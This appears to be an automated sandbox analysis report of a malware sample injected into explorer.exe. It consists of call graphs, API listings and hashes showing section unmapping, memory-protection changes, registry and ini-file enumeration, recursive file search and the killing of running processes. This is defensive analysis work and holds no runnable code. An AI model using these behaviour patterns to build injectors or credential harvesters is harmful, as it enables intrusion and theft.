9ba1e6 1139->1140 1141 9ba298 3 API calls 1140->1141 1142 9ba248 1141->1142 939 9b37f4 940 9b3804 939->940 947 9b372c 940->947 944 9b3817 945 9b387c 944->945 957 9b36c8 944->957 948 9b375a 947->948 949 9b3777 RegCreateKeyExW 948->949 950 9b37bc RegCloseKey 949->950 951 9b37cd 949->951 950->951 965 9b1860 951->965 954 9b22b4 955 9b22c8 CreateStreamOnHGlobal 954->955 956 9b22d6 954->956 955->956 956->944 958 9b371e 957->958 959 9b36cd 957->959 958->945 960 9b3716 959->960 969 9b21e4 959->969 962 9b1860 RtlFreeHeap 960->962 962->958 963 9b3706 964 9b1860 RtlFreeHeap 963->964 964->960 966 9b186e 965->966 967 9b1886 966->967 968 9b1878 RtlFreeHeap 966->968 967->945 967->954 968->967 970 9b220b 969->970 975 9b1e20 970->975 973 9b1860 RtlFreeHeap 974 9b2297 973->974 974->963 985 9b1e6d 975->985 976 9b21b5 977 9b1860 RtlFreeHeap 976->977 978 9b21cb 977->978 978->973 979 9b219b 979->976 980 9b1860 RtlFreeHeap 979->980 980->976 981 9b2177 982 9b1860 RtlFreeHeap 981->982 983 9b218e 982->983 983->979 984 9b1860 RtlFreeHeap 983->984 984->979 985->976 985->979 985->981 986 9b1860 RtlFreeHeap 985->986 986->981

                                                                                                                                                      Callgraph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      • Opacity -> Relevance
                                                                                                                                                      • Disassembly available
                                                                                                                                                      callgraph 0 Function_009BA298 45 Function_009BA25A 0->45 1 Function_009B2498 36 Function_009B23AC 1->36 60 Function_009B2340 1->60 2 Function_009B141D 3 Function_009B971C 4 Function_009B9912 5 Function_009B9C92 6 Function_009B2610 25 Function_009B1838 6->25 7 Function_009B2410 7->36 69 Function_009B23F0 7->69 8 Function_009B1D10 8->25 65 Function_009B18F8 8->65 9 Function_009B2514 40 Function_009B23A0 9->40 50 Function_009B2354 9->50 56 Function_009B234C 9->56 9->69 83 Function_009B2360 9->83 10 Function_009B1B14 10->25 11 Function_009B3608 46 Function_009B3458 11->46 12 Function_009B2688 12->25 13 Function_009B2308 14 Function_009B1508 15 Function_009BB00C 16 Function_009B188C 16->25 17 Function_009B1B8C 17->25 18 Function_009B298C 19 Function_009B1980 20 Function_009B1000 21 Function_009B2700 21->12 80 Function_009B1860 21->80 22 Function_009B1405 23 Function_009B2E04 23->17 23->25 23->80 24 Function_009B2938 26 Function_009B1938 27 Function_009B14B2 28 Function_009B9930 29 Function_009B38B0 29->25 29->29 51 Function_009B1AD4 29->51 30 Function_009B9EB4 31 Function_009B22B4 32 Function_009B30A8 32->12 32->21 32->32 37 Function_009B272C 32->37 66 Function_009B2AF8 32->66 68 Function_009B2F7C 32->68 32->80 33 Function_009BA1AF 33->0 34 Function_009B372C 34->25 34->80 35 Function_009B22AC 38 Function_009B1822 39 Function_009B28A0 39->25 72 Function_009B2774 39->72 39->80 41 Function_009B1E20 41->8 41->16 41->19 41->25 47 Function_009B18D0 41->47 59 Function_009B1C40 41->59 41->65 41->80 81 Function_009B1DE0 41->81 42 Function_009B99A7 43 Function_009B47A7 44 Function_009B9ADA 46->12 46->21 46->25 46->39 46->46 49 Function_009B3254 46->49 61 Function_009B29C0 46->61 46->72 46->80 48 Function_009BA055 49->12 49->18 49->24 49->25 49->32 49->37 49->80 52 Function_009B14D4 53 Function_009B1254 54 Function_009B2A54 54->25 54->80 55 Function_009B36C8 55->10 74 Function_009B18E8 55->74 55->80 84 Function_009B21E4 55->84 57 Function_009B1A4C 58 Function_009B9FC2 61->12 62 Function_009B2BC0 62->6 62->12 62->21 62->25 62->26 62->37 62->54 62->80 63 Function_009BA1F9 63->0 64 Function_009B14F9 66->25 67 Function_009B2EF8 67->6 68->23 68->54 68->62 68->67 68->80 69->36 70 Function_009B2570 70->25 70->40 70->50 71 Function_009B1576 72->25 72->72 72->80 73 Function_009B37F4 73->13 73->31 73->34 73->35 73->50 73->55 73->70 75 Function_009B22E8 73->75 78 Function_009B2B6C 73->78 76 Function_009B3668 76->46 77 Function_009B156C 78->1 78->9 79 Function_009BA1E0 79->0 80->51 81->57 82 Function_009B1560 84->25 84->41 84->80

                                                                                                                                                      Executed Functions

                                                                                                                                                      Function 009B30A8 Relevance: 4.7, APIs: 3, Instructions: 153fileCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 184 9b30a8-9b30e3 call 9b2688 call 9b272c 189 9b30ec-9b3111 call 9b2688 FindFirstFileW 184->189 190 9b30e5-9b30e6 184->190 193 9b3237-9b3252 call 9b1860 * 2 189->193 194 9b3117-9b3118 189->194 190->189 195 9b311f-9b3124 194->195 197 9b312a-9b313e 195->197 198 9b31ad-9b31df call 9b2688 call 9b2700 195->198 206 9b3210-9b3220 FindNextFileW 197->206 207 9b3144-9b3158 197->207 214 9b3208-9b320b call 9b1860 198->214 215 9b31e1-9b31eb call 9b2af8 198->215 206->195 209 9b3226-9b3230 FindClose 206->209 207->206 211 9b315e-9b316b call 9b272c 207->211 209->193 219 9b316d-9b3174 211->219 220 9b3176 211->220 214->206 215->214 223 9b31ed-9b3203 call 9b2f7c 215->223 222 9b3178-9b31a8 call 9b2688 call 9b2700 call 9b30a8 call 9b1860 219->222 220->222 222->198 223->214
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000010.00000002.1730528673.00000000009B1000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_16_2_9b1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Find$File$CloseFirstNext
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3541575487-0
                                                                                                                                                      • Opcode ID: 1d486c4d822fa2842588a2a5b257e154b5955fe3e65b36dc891d1a63625ddf83
                                                                                                                                                      • Instruction ID: fca96132bd87536ada9bed21c6546bd3b7b5fb31c1c74e669ce4837aca476caa
                                                                                                                                                      • Opcode Fuzzy Hash: 1d486c4d822fa2842588a2a5b257e154b5955fe3e65b36dc891d1a63625ddf83
                                                                                                                                                      • Instruction Fuzzy Hash: E5417130318B4C5FDB94FB3899997EA73D6FBD8360F448A29A44AC3191EE78D9048781
                                                                                                                                                      Function 009B38B0 Relevance: 1.5, APIs: 1, Instructions: 40nativeCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 239 9b38b0-9b3907 call 9b1ad4 call 9b1838 NtUnmapViewOfSection call 9b388c 248 9b3909-9b390c call 9b38b0 239->248 249 9b3911-9b391a 239->249 248->249
                                                                                                                                                      APIs
                                                                                                                                                      • NtUnmapViewOfSection.NTDLL ref: 009B38F2
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000010.00000002.1730528673.00000000009B1000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_16_2_9b1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: SectionUnmapView
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 498011366-0
                                                                                                                                                      • Opcode ID: 3effbf976d711b6f0a270e8bac9098164ff64bae19101d68ee38af86237bc783
                                                                                                                                                      • Instruction ID: 7542fa57ab46ecc146ba10bd667b9bebf3ca7f93d01104b451d23688b60a558a
                                                                                                                                                      • Opcode Fuzzy Hash: 3effbf976d711b6f0a270e8bac9098164ff64bae19101d68ee38af86237bc783
                                                                                                                                                      • Instruction Fuzzy Hash: 58F0E520F11A081BEF6CB7BD6A9D3B83284EB98320F908629B515C32D2DC398E458302
                                                                                                                                                      Function 009B2774 Relevance: 6.1, APIs: 4, Instructions: 124registryCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      • RegOpenKeyExW.KERNELBASE ref: 009B27C7
                                                                                                                                                      • RegQueryValueExW.KERNELBASE ref: 009B27F4
                                                                                                                                                      • RegQueryValueExW.KERNELBASE ref: 009B283A
                                                                                                                                                      • RegCloseKey.KERNELBASE ref: 009B2860
                                                                                                                                                        • Part of subcall function 009B1860: RtlFreeHeap.NTDLL ref: 009B1880
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000010.00000002.1730528673.00000000009B1000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_16_2_9b1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: QueryValue$CloseFreeHeapOpen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1641618270-0
                                                                                                                                                      • Opcode ID: 9230968f98c31981e9a295993d042543a9bd8a1a5e48c502c57164f1c8228ab1
                                                                                                                                                      • Instruction ID: 501fc25825a740ab3f1afd8e7ad29df6d8839325ee35a73623671ebbef37940e
                                                                                                                                                      • Opcode Fuzzy Hash: 9230968f98c31981e9a295993d042543a9bd8a1a5e48c502c57164f1c8228ab1
                                                                                                                                                      • Instruction Fuzzy Hash: 5131A73020CB488FE769DB28D5987BA77E4FBE8365F54062EE48AC2264DF34C8458742
                                                                                                                                                      Function 009B372C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71registryCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 22 9b372c-9b37ba call 9b1838 RegCreateKeyExW 26 9b37bc-9b37cb RegCloseKey 22->26 27 9b37d6-9b37f0 call 9b1860 22->27 26->27 28 9b37cd-9b37d3 26->28 28->27
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000010.00000002.1730528673.00000000009B1000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_16_2_9b1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseCreate
                                                                                                                                                      • String ID: ?
                                                                                                                                                      • API String ID: 2932200918-1684325040
                                                                                                                                                      • Opcode ID: 857738d7a85a5e3c817c71693e64eb2082b10df52a007d4c7754adbbf86b2b9f
                                                                                                                                                      • Instruction ID: f309e7cde775adf2fc27b618b1afd52fa00962e147f99e2f61acc50d4bcb11ca
                                                                                                                                                      • Opcode Fuzzy Hash: 857738d7a85a5e3c817c71693e64eb2082b10df52a007d4c7754adbbf86b2b9f
                                                                                                                                                      • Instruction Fuzzy Hash: 97116070618B488FD751DF69D48866AB7E1FBD8355F50062EE48AC3260DF389985CB82
                                                                                                                                                      Function 009BA298 Relevance: 4.8, APIs: 3, Instructions: 252memorylibraryCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 31 9ba298-9ba29b 32 9ba2a5-9ba2a9 31->32 33 9ba2ab-9ba2b3 32->33 34 9ba2b5 32->34 33->34 35 9ba29d-9ba2a3 34->35 36 9ba2b7 34->36 35->32 37 9ba2ba-9ba2c1 36->37 39 9ba2cd 37->39 40 9ba2c3-9ba2cb 37->40 39->37 41 9ba2cf-9ba2d2 39->41 40->39 42 9ba2e7-9ba2f4 41->42 43 9ba2d4-9ba2e2 41->43 53 9ba30e-9ba31c call 9ba25a 42->53 54 9ba2f6-9ba2f8 42->54 44 9ba31e-9ba339 43->44 45 9ba2e4-9ba2e5 43->45 46 9ba36a-9ba36d 44->46 45->42 48 9ba36f-9ba370 46->48 49 9ba372-9ba379 46->49 51 9ba351-9ba355 48->51 52 9ba37f-9ba383 49->52 55 9ba33b-9ba33e 51->55 56 9ba357-9ba35a 51->56 57 9ba3e0-9ba3e9 52->57 58 9ba385-9ba39e LoadLibraryA 52->58 53->32 59 9ba2fb-9ba302 54->59 55->49 64 9ba340 55->64 56->49 60 9ba35c-9ba360 56->60 61 9ba3ec-9ba3f5 57->61 63 9ba39f-9ba3a6 58->63 79 9ba30c 59->79 80 9ba304-9ba30a 59->80 65 9ba362-9ba369 60->65 66 9ba341-9ba345 60->66 67 9ba41a-9ba46a VirtualProtect * 2 61->67 68 9ba3f7-9ba3f9 61->68 63->52 70 9ba3a8 63->70 64->66 65->46 66->51 77 9ba347-9ba349 66->77 74 9ba46e-9ba473 67->74 72 9ba3fb-9ba40a 68->72 73 9ba40c-9ba418 68->73 75 9ba3aa-9ba3b2 70->75 76 9ba3b4-9ba3bc 70->76 72->61 73->72 74->74 81 9ba475-9ba484 74->81 82 9ba3be-9ba3ca 75->82 76->82 77->51 78 9ba34b-9ba34f 77->78 78->51 78->56 79->53 79->59 80->79 85 9ba3cc-9ba3d3 82->85 86 9ba3d5-9ba3df 82->86 85->63
                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryA.KERNELBASE ref: 009BA397
                                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 009BA441
                                                                                                                                                      • VirtualProtect.KERNELBASE ref: 009BA45F
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000010.00000002.1730528673.00000000009B9000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B9000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_16_2_9b9000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual$LibraryLoad
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 895956442-0
                                                                                                                                                      • Opcode ID: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
                                                                                                                                                      • Instruction ID: 9847ab5aedea81ed1308852c92ee1579379ff2164f83acb1e7bab67bc7e4fc6f
                                                                                                                                                      • Opcode Fuzzy Hash: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
                                                                                                                                                      • Instruction Fuzzy Hash: 28517A32758D1E4BDB24AB7C9DC47F5B3D1F769331B580A2BC49AC3284EA59D8468383
                                                                                                                                                      Function 009B3254 Relevance: 4.7, APIs: 3, Instructions: 210COMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 87 9b3254-9b3287 call 9b298c 90 9b343a-9b3456 87->90 91 9b328d-9b3297 call 9b298c 87->91 91->90 94 9b329d-9b32aa call 9b272c 91->94 97 9b32ac-9b32b3 94->97 98 9b32b5 94->98 99 9b32b7-9b32c2 call 9b2688 97->99 98->99 102 9b32c8-9b32fe call 9b2688 call 9b1838 * 2 call 9b2938 99->102 103 9b342c-9b3435 call 9b30a8 99->103 113 9b340c-9b3427 call 9b1860 * 4 102->113 114 9b3304-9b3318 GetPrivateProfileSectionNamesW 102->114 103->90 113->103 114->113 115 9b331e-9b3326 114->115 115->113 118 9b332c-9b332f 115->118 118->113 120 9b3335-9b3348 118->120 125 9b334e-9b3377 GetPrivateProfileStringW 120->125 126 9b33f0-9b3406 120->126 125->126 128 9b3379-9b3398 GetPrivateProfileIntW 125->128 126->113 126->118 130 9b339a-9b33ad call 9b2688 128->130 131 9b33e5-9b33eb call 9b30a8 128->131 135 9b33af-9b33b3 130->135 136 9b33c6-9b33e3 call 9b30a8 call 9b1860 130->136 131->126 137 9b33bd-9b33c4 135->137 138 9b33b5-9b33ba 135->138 136->126 137->135 137->136 138->137
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 009B298C: GetFileAttributesW.KERNELBASE ref: 009B299E
                                                                                                                                                      • GetPrivateProfileSectionNamesW.KERNEL32 ref: 009B330F
                                                                                                                                                      • GetPrivateProfileStringW.KERNEL32 ref: 009B336F
                                                                                                                                                      • GetPrivateProfileIntW.KERNEL32 ref: 009B338C
                                                                                                                                                        • Part of subcall function 009B30A8: FindFirstFileW.KERNELBASE ref: 009B3104
                                                                                                                                                        • Part of subcall function 009B1860: RtlFreeHeap.NTDLL ref: 009B1880
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000010.00000002.1730528673.00000000009B1000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_16_2_9b1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: PrivateProfile$File$AttributesFindFirstFreeHeapNamesSectionString
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 970345848-0
                                                                                                                                                      • Opcode ID: 2b93d8c4a12b134edfd1353bbe2ba01486881703c9a40a6279b7507c54960219
                                                                                                                                                      • Instruction ID: 35c6773c9559f86e2272b7898d7c138b873e91d9e4063f01e67173abe3e284e8
                                                                                                                                                      • Opcode Fuzzy Hash: 2b93d8c4a12b134edfd1353bbe2ba01486881703c9a40a6279b7507c54960219
                                                                                                                                                      • Instruction Fuzzy Hash: BC51C830728F094BDB19FB2C99567B933D2FBD8720B84456EE40AC3296EE64DD458386
                                                                                                                                                      Function 009B3458 Relevance: 4.7, APIs: 3, Instructions: 172registryCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      • StrStrIW.KERNELBASE ref: 009B347E
                                                                                                                                                      • RegOpenKeyExW.KERNELBASE ref: 009B353F
                                                                                                                                                      • RegEnumKeyExW.KERNELBASE ref: 009B35D6
                                                                                                                                                        • Part of subcall function 009B2774: RegOpenKeyExW.KERNELBASE ref: 009B27C7
                                                                                                                                                        • Part of subcall function 009B2774: RegQueryValueExW.KERNELBASE ref: 009B27F4
                                                                                                                                                        • Part of subcall function 009B2774: RegQueryValueExW.KERNELBASE ref: 009B283A
                                                                                                                                                        • Part of subcall function 009B2774: RegCloseKey.KERNELBASE ref: 009B2860
                                                                                                                                                        • Part of subcall function 009B3254: GetPrivateProfileSectionNamesW.KERNEL32 ref: 009B330F
                                                                                                                                                        • Part of subcall function 009B1860: RtlFreeHeap.NTDLL ref: 009B1880
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000010.00000002.1730528673.00000000009B1000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_16_2_9b1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: OpenQueryValue$CloseEnumFreeHeapNamesPrivateProfileSection
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1841478724-0
                                                                                                                                                      • Opcode ID: 64400a878c992fa71e856e46df4fac4649fc2a7aa652cbc33b09ef089e85c32b
                                                                                                                                                      • Instruction ID: df9412db0b71f3a060d4fc7b1871d3f609c0198478b76556d8462bbad46f8eff
                                                                                                                                                      • Opcode Fuzzy Hash: 64400a878c992fa71e856e46df4fac4649fc2a7aa652cbc33b09ef089e85c32b
                                                                                                                                                      • Instruction Fuzzy Hash: 20416C30718B0C4FDBA8EF6D95997AAB6E6FBD8350F40456EA14EC3261DE34D9048742
                                                                                                                                                      Function 009B2938 Relevance: 3.0, APIs: 2, Instructions: 34fileCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 232 9b2938-9b2943 233 9b2945-9b2948 232->233 234 9b2984 232->234 233->234 236 9b294a-9b2970 CreateFileW 233->236 235 9b2986-9b298b 234->235 237 9b2972-9b297a CloseHandle 236->237 238 9b2980-9b2982 236->238 237->238 238->235
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000010.00000002.1730528673.00000000009B1000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_16_2_9b1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseCreateFileHandle
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3498533004-0
                                                                                                                                                      • Opcode ID: c2797be9488e4e6f5c36404d807aecabd0db32494513c6dc611a488961ed8fb4
                                                                                                                                                      • Instruction ID: 2aa9de96a5121576605e0d446675fac32c81edba412f56cabfaf33846e470071
                                                                                                                                                      • Opcode Fuzzy Hash: c2797be9488e4e6f5c36404d807aecabd0db32494513c6dc611a488961ed8fb4
                                                                                                                                                      • Instruction Fuzzy Hash: ADF02B7021570A4FE7446FB84698376B5D4FB083A5F18473DE45EC62D0D73888428702
                                                                                                                                                      Function 009B22B4 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 251 9b22b4-9b22c6 252 9b22c8-9b22d0 CreateStreamOnHGlobal 251->252 253 9b22d6-9b22e6 251->253 252->253
                                                                                                                                                      APIs
                                                                                                                                                      • CreateStreamOnHGlobal.COMBASE ref: 009B22D0
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000010.00000002.1730528673.00000000009B1000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_16_2_9b1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateGlobalStream
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2244384528-0
                                                                                                                                                      • Opcode ID: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
                                                                                                                                                      • Instruction ID: c656f4108ff02d332105a31c43a7bc61f3031b77bc2b05dc5b024a551162fddb
                                                                                                                                                      • Opcode Fuzzy Hash: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
                                                                                                                                                      • Instruction Fuzzy Hash: 60E0C230108B0A8FD758AFBCE5CA07933A1FB9C252B05053FE005CB114D27988C1C741
                                                                                                                                                      Function 009B298C Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 254 9b298c-9b2997 255 9b2999-9b299c 254->255 256 9b29b5 254->256 255->256 257 9b299e-9b29a7 GetFileAttributesW 255->257 258 9b29b7-9b29bc 256->258 259 9b29a9-9b29af 257->259 260 9b29b1-9b29b3 257->260 259->260 260->258
                                                                                                                                                      APIs
                                                                                                                                                      • GetFileAttributesW.KERNELBASE ref: 009B299E
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000010.00000002.1730528673.00000000009B1000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_16_2_9b1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                      • Opcode ID: adac2ff7f887c72d82cf14b017212d62fc95523d70b35a7e56ac7f1322cd4b31
                                                                                                                                                      • Instruction ID: 1faae466902d2459315a0ff39b01283ea8243981ca092cc74b3535d9d82b6b64
                                                                                                                                                      • Opcode Fuzzy Hash: adac2ff7f887c72d82cf14b017212d62fc95523d70b35a7e56ac7f1322cd4b31
                                                                                                                                                      • Instruction Fuzzy Hash: 7AD0A722722905077B6427F90BDD2F130A8D71933AF14033AEB3EC11E0E289CCD5A201
                                                                                                                                                      Function 009B1860 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 261 9b1860-9b1870 call 9b1ad4 264 9b1872-9b1880 RtlFreeHeap 261->264 265 9b1886-9b188b 261->265 264->265
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000010.00000002.1730528673.00000000009B1000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_16_2_9b1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FreeHeap
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3298025750-0
                                                                                                                                                      • Opcode ID: d99d8c33ae82ccdfde5110b6ab349530d41223e3f7429e99417b491f4accb22a
                                                                                                                                                      • Instruction ID: 058a5bbd5390813f1975c0ddb5d9a49b65c9572dd7f1bdd0aa37cd09d70504a4
                                                                                                                                                      • Opcode Fuzzy Hash: d99d8c33ae82ccdfde5110b6ab349530d41223e3f7429e99417b491f4accb22a
                                                                                                                                                      • Instruction Fuzzy Hash: 08D01224716A040BEF2CBBFA1D9D2B47AD6E798222B588065B819C3251DD39D895C341

                                                                                                                                                      Execution Graph

                                                                                                                                                      Execution Coverage:14.4%
                                                                                                                                                      Dynamic/Decrypted Code Coverage:96.2%
                                                                                                                                                      Signature Coverage:3.8%
                                                                                                                                                      Total number of Nodes:212
                                                                                                                                                      Total number of Limit Nodes:2
                                                                                                                                                      execution_graph 673 801000 674 801010 673->674 675 801007 673->675 677 801016 675->677 685 8027e2 VirtualQuery 677->685 680 801022 680->674 682 80102e RtlMoveMemory NtUnmapViewOfSection 688 80104f 682->688 686 80101e 685->686 686->680 687 8029b7 GetProcessHeap RtlAllocateHeap 686->687 687->682 727 8029b7 GetProcessHeap RtlAllocateHeap 688->727 690 80105c 728 8029b7 GetProcessHeap RtlAllocateHeap 690->728 692 80106b ExpandEnvironmentStringsW 693 801085 692->693 694 80108c ExpandEnvironmentStringsW 692->694 729 80123a 693->729 696 8010a0 ExpandEnvironmentStringsW 694->696 697 801099 694->697 699 8010b4 SHGetSpecialFolderPathW 696->699 700 8010ad 696->700 698 80123a 24 API calls 697->698 698->696 702 8010c5 699->702 703 8010cc ExpandEnvironmentStringsW 699->703 701 80123a 24 API calls 700->701 701->699 704 80123a 24 API calls 702->704 705 8010e0 ExpandEnvironmentStringsW 703->705 706 8010d9 703->706 704->703 708 8010f4 ExpandEnvironmentStringsW 705->708 709 8010ed 705->709 736 8011cc 706->736 711 801101 708->711 712 801108 ExpandEnvironmentStringsW 708->712 751 801192 709->751 713 801192 16 API calls 711->713 714 801115 712->714 715 80111c ExpandEnvironmentStringsW 712->715 713->712 718 801192 16 API calls 714->718 716 801130 715->716 717 801129 715->717 758 802999 716->758 719 801192 16 API calls 717->719 718->715 719->716 722 801187 ExitProcess 724 80114e 725 80117f 724->725 726 801158 wsprintfA 724->726 725->722 726->725 726->726 727->690 728->692 764 80274a CreateToolhelp32Snapshot 729->764 734 80255c 16 API calls 735 801268 734->735 735->694 737 80255c 16 API calls 736->737 738 8011e6 737->738 739 80255c 16 API calls 738->739 740 8011f3 739->740 741 80255c 16 API calls 740->741 742 801200 741->742 743 80255c 16 API calls 742->743 744 80120d 743->744 745 80255c 16 API calls 744->745 746 80121a 745->746 747 80255c 16 API calls 746->747 748 801227 747->748 749 80255c 16 API calls 748->749 750 801234 749->750 750->705 752 80255c 16 API calls 751->752 753 8011ac 752->753 754 80255c 16 API calls 753->754 755 8011b9 754->755 756 80255c 16 API calls 755->756 757 8011c6 756->757 757->708 759 8027e2 VirtualQuery 758->759 760 8029a1 759->760 761 801137 760->761 762 8029a5 GetProcessHeap HeapFree 760->762 761->722 763 8029b7 GetProcessHeap RtlAllocateHeap 761->763 762->761 763->724 765 802765 Process32First 764->765 766 801249 764->766 767 8027ae 765->767 773 80255c 766->773 768 8027b2 CloseHandle 767->768 769 80277f lstrcmpiA 767->769 768->766 770 8027a0 Process32Next 769->770 771 802795 769->771 770->767 788 8027be OpenProcess 771->788 791 8029b7 GetProcessHeap RtlAllocateHeap 773->791 775 80257a lstrcatW PathAppendW 776 8025a2 FindFirstFileW 775->776 777 80265d 775->777 776->777 778 8025b9 776->778 779 802999 3 API calls 777->779 780 8025bd RtlZeroMemory 778->780 782 80263e FindNextFileW 778->782 783 80260f lstrcatW PathAppendW 778->783 786 8025df lstrcatW PathAppendW 778->786 787 80255c 5 API calls 778->787 781 80125b 779->781 780->778 781->734 782->780 785 802652 FindClose 782->785 783->782 784 802627 StrStrIW 783->784 784->778 784->782 785->777 786->778 786->782 787->778 789 8027e0 788->789 790 8027d0 TerminateProcess CloseHandle 788->790 789->770 790->789 791->775 826 802013 827 802036 826->827 828 802029 lstrlen 826->828 837 8029b7 GetProcessHeap RtlAllocateHeap 827->837 828->827 830 80203e lstrcat 831 802073 lstrcat 830->831 832 80207a 830->832 831->832 838 8020a7 832->838 835 802999 3 API calls 836 80209d 835->836 837->830 872 802415 838->872 842 8020d4 877 802938 lstrlen 